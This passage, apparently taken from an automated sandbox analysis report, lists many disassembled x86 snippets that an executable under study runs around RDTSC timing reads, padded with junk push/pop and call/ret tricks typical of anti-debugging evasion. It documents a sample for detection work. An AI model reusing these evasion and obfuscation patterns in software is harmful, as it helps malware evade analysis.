0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80EB34 second address: 80EB4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80F307 second address: 80F320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80FFBC second address: 80FFDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80FD8E second address: 80FD93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80FD93 second address: 80FDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007FCBACB2D11Fh 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810B43 second address: 810B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810B47 second address: 810B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810C0D second address: 810C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810C11 second address: 810C32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810C32 second address: 810C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 811397 second address: 8113A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCBACB2D116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 813A99 second address: 813A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 813A9D second address: 813ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FCBACB2D124h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 813ABD second address: 813AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 814A29 second address: 814A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 818ED5 second address: 818EDA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 816A4D second address: 816A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 818EDA second address: 818EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FCBAD522AB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 816A56 second address: 816A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 816A5A second address: 816A5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 818EF9 second address: 818F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D125h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+1247EE46h], ecx 0x00000011 push 00000000h 0x00000013 mov edi, 14305337h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FCBACB2D118h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 xor edi, dword ptr [ebp+122D1B18h] 0x0000003a xchg eax, esi 0x0000003b jmp 00007FCBACB2D11Bh 0x00000040 push eax 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 818F56 second address: 818F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8190C0 second address: 8190C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8190C5 second address: 8190CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81A092 second address: 81A098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81A098 second address: 81A0C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCBAD522AB9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81BE68 second address: 81BE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81BE6C second address: 81BF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FCBAD522AA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b xor dword ptr [ebp+122D218Eh], edi 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 xor dword ptr [ebp+122D178Ch], esi 0x0000003e mov eax, dword ptr [ebp+122D1449h] 0x00000044 or di, 9EB6h 0x00000049 push FFFFFFFFh 0x0000004b jmp 00007FCBAD522AB6h 0x00000050 nop 0x00000051 pushad 0x00000052 jmp 00007FCBAD522AB4h 0x00000057 jne 00007FCBAD522AA8h 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push edi 0x00000062 jno 00007FCBAD522AA6h 0x00000068 pop edi 0x00000069 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81BF01 second address: 81BF1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D128h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81EBEC second address: 81EBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81EBF2 second address: 81EBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81EBF7 second address: 81EC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81FBE7 second address: 81FBEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81FBEB second address: 81FBF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 820BC9 second address: 820C47 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBACB2D118h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push eax 0x00000010 sub ebx, 4BCAF1B2h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FCBACB2D118h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D2905h], ebx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007FCBACB2D118h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 jl 00007FCBACB2D11Ch 0x0000005b xor ebx, 74DCD108h 0x00000061 mov edi, dword ptr [ebp+1245338Dh] 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c jp 00007FCBACB2D116h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 820C47 second address: 820C51 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 823328 second address: 8233AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBACB2D128h 0x00000009 popad 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FCBACB2D118h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007FCBACB2D118h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 push 00000000h 0x00000044 mov ebx, dword ptr [ebp+1247EDF2h] 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c jmp 00007FCBACB2D11Dh 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8233AB second address: 8233B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81CF02 second address: 81CF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8241AB second address: 8241B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBAD522AA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8241B6 second address: 8241C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 81CF06 second address: 81CF0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8253E3 second address: 82540A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jp 00007FCBACB2D116h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCBACB2D122h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 828499 second address: 8284AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 82C32B second address: 82C33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 je 00007FCBACB2D11Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 82BC2A second address: 82BC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 82BC2E second address: 82BC38 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCBACB2D116h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 82BD9F second address: 82BDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CBC57 second address: 7CBC7D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBACB2D116h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FCBACB2D123h 0x00000014 pop esi 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CBC7D second address: 7CBC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB2h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CBC97 second address: 7CBC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 835A4B second address: 835A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 835FB5 second address: 835FD5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBACB2D127h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 836996 second address: 83699A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83699A second address: 8369B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FCBACB2D128h 0x0000000c je 00007FCBACB2D116h 0x00000012 jmp 00007FCBACB2D11Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83AF7D second address: 83AFA5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBAD522AB6h 0x00000008 jmp 00007FCBAD522AAAh 0x0000000d jnp 00007FCBAD522AA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FCBAD522AACh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83B0F7 second address: 83B0FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83B3D4 second address: 83B3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83B3DA second address: 83B3DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83B649 second address: 83B64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83BB9E second address: 83BBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83BBA5 second address: 83BBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBAD522AABh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 840891 second address: 8408BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FCBACB2D128h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8408BD second address: 8408E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 jno 00007FCBAD522ABCh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83F60E second address: 83F614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83F614 second address: 83F618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807958 second address: 8079A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCBACB2D121h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jbe 00007FCBACB2D118h 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jg 00007FCBACB2D12Dh 0x00000022 jo 00007FCBACB2D11Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8079A5 second address: 807A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007FCBAD522AB5h 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FCBAD522AA8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov edx, dword ptr [ebp+122D391Ch] 0x0000002f call 00007FCBAD522AA9h 0x00000034 pushad 0x00000035 jmp 00007FCBAD522AB8h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807A11 second address: 807A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807A28 second address: 807A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807A2C second address: 807A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D122h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jg 00007FCBACB2D116h 0x00000010 pop edx 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jc 00007FCBACB2D123h 0x0000001c jmp 00007FCBACB2D11Dh 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807A68 second address: 807A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCBAD522AA6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 807BAF second address: 807BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D129h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80829E second address: 8082A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8085E3 second address: 8085E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8085E7 second address: 808621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FCBAD522AB8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBAD522AB6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8086D9 second address: 8086E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FCBACB2D11Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83F940 second address: 83F944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83FF46 second address: 83FF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83FF4C second address: 83FF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FCBAD522ABBh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jg 00007FCBAD522AA6h 0x00000016 jno 00007FCBAD522AA6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FCBAD522AAFh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 83FF91 second address: 83FF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8400FA second address: 840109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FCBAD522AA6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
